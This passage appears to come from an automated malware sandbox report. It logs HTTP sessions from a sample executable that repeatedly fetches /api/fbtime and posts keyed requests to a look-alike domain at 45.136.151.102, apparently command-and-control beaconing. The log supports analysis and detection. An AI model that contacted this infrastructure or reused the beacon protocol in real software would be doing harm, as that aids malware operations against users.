Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 30 31 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 33 56 52 34 58 55 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150019,"time":1635061588,"rand_str":"3VR4XU"}0

Oct 24, 2021 09:46:29.133558035 CEST
1357 OUT POST /api/?sid=2150019&key=6c4543fee94c34490cafe241dae1f023 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:29.287159920 CEST
1358 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

130 192.168.2.5 49920 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

131 192.168.2.5 49923 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

132 192.168.2.5 49924 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

133 192.168.2.5 49925 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

134 192.168.2.5 49926 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

135 192.168.2.5 49927 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

136 192.168.2.5 49928 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

137 192.168.2.5 49929 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

138 192.168.2.5 49930 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

139 192.168.2.5 49931 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

14 192.168.2.5 49766 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:30.222265005 CEST
1359 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:30.368000984 CEST
1359 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 30 39 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 50 61 78 65 7a 79 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150093,"time":1635061590,"rand_str":"Paxezy"}0

Oct 24, 2021 09:46:30.462079048 CEST
1359 OUT POST /api/?sid=2150093&key=6e5de35b796142fbcf8f6d325b040018 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:30.613193035 CEST
1360 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

140 192.168.2.5 49932 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

141 192.168.2.5 49933 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

142 192.168.2.5 49934 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

143 192.168.2.5 49935 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

144 192.168.2.5 49936 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

145 192.168.2.5 49937 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

15 192.168.2.5 49767 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:31.909816980 CEST
1361 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:32.101710081 CEST
1361 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 31 38 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 67 4e 64 65 43 43 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150187,"time":1635061591,"rand_str":"gNdeCC"}0

Oct 24, 2021 09:46:32.287842035 CEST
1362 OUT POST /api/?sid=2150187&key=58eda2f16bea8597906a0c39546b4751 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:32.440355062 CEST
1362 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

16 192.168.2.5 49768 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:33.562303066 CEST
1363 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:33.712238073 CEST
1364 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 32 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 36 72 50 35 42 4d 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150263,"time":1635061593,"rand_str":"6rP5BM"}0

Oct 24, 2021 09:46:33.971893072 CEST
1364 OUT POST /api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:34.122612000 CEST
1365 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

17 192.168.2.5 49769 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:35.049237013 CEST
1366 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:35.198050976 CEST
1366 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 33 32 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 46 4b 4d 75 71 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150329,"time":1635061595,"rand_str":"hFKMuq"}0

Oct 24, 2021 09:46:35.355761051 CEST
1366 OUT POST /api/?sid=2150329&key=e265996d76c1500e0649f58ac61c7690 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:35.506477118 CEST
1367 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

18 192.168.2.5 49770 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:36.540766954 CEST
1368 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:36.688316107 CEST
1368 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 33 37 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 71 6a 44 47 41 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150371,"time":1635061596,"rand_str":"uqjDGA"}0

Oct 24, 2021 09:46:36.806778908 CEST
1369 OUT POST /api/?sid=2150371&key=814316fb83cc23ea4f6bee56f3d3e033 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:37.032989025 CEST
1369 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

19 192.168.2.5 49771 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:37.992247105 CEST
1370 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:38.139581919 CEST
1371 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 34 33 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 76 6b 58 49 4b 34 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150431,"time":1635061598,"rand_str":"vkXIK4"}0

Oct 24, 2021 09:46:38.253591061 CEST
1371 OUT POST /api/?sid=2150431&key=8566e456c914f2b7c1956cb023b47cdb HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:38.409102917 CEST
1372 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

2 192.168.2.5 49747 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:13.880568027 CEST
1150 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:14.029927969 CEST
1187 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 32 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 52 75 79 63 71 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2149263,"time":1635061573,"rand_str":"5Ruycq"}0

Oct 24, 2021 09:46:14.115669966 CEST
1323 OUT POST /api/?sid=2149263&key=30871ac7c5fca22d591ee3c3e3f7faa8 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:14.271146059 CEST
1324 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

20 192.168.2.5 49772 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:39.382689953 CEST
1373 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:39.533291101 CEST
1373 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 34 37 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 52 59 39 64 4b 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150479,"time":1635061599,"rand_str":"5RY9dK"}0

Oct 24, 2021 09:46:39.628333092 CEST
1373 OUT POST /api/?sid=2150479&key=d26e2d32e64af0304786124de837af72 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:39.781892061 CEST
1375 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

21 192.168.2.5 49775 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:40.870773077 CEST
1397 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:41.015261889 CEST
1398 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 35 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 55 65 36 68 70 67 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150543,"time":1635061600,"rand_str":"Ue6hpg"}0

Oct 24, 2021 09:46:41.125655890 CEST
1398 OUT POST /api/?sid=2150543&key=dc8b6a39192685a24adf63edb72eaa2f HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:41.280822039 CEST
1399 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

22 192.168.2.5 49776 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:42.144409895 CEST
1400 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:42.296432018 CEST
1400 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 35 39 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 45 47 57 48 4e 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150597,"time":1635061602,"rand_str":"hEGWHN"}0

Oct 24, 2021 09:46:42.505656004 CEST
1401 OUT POST /api/?sid=2150597&key=f556d9b1b3eb13930c8eb84fd2c75d69 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:42.660232067 CEST
1401 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

23 192.168.2.5 49777 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:43.287152052 CEST
1402 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:43.442729950 CEST
1402 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 36 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 34 42 52 48 64 69 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150643,"time":1635061603,"rand_str":"4BRHdi"}0

Oct 24, 2021 09:46:43.451596975 CEST
1403 OUT POST /api/?sid=2150643&key=00bda22e431ce351ebc677dc0b52b42e HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:43.604079962 CEST
1404 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

24 192.168.2.5 49778 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:43.910032988 CEST
1404 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:44.059397936 CEST
1405 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 36 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 50 79 37 55 41 32 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150673,"time":1635061603,"rand_str":"Py7UA2"}0

Oct 24, 2021 09:46:44.071578026 CEST
1405 OUT POST /api/?sid=2150673&key=240dac36d4da93b289eb9fc9b1dbf3cf HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:44.230175018 CEST
1406 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

25 192.168.2.5 49779 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

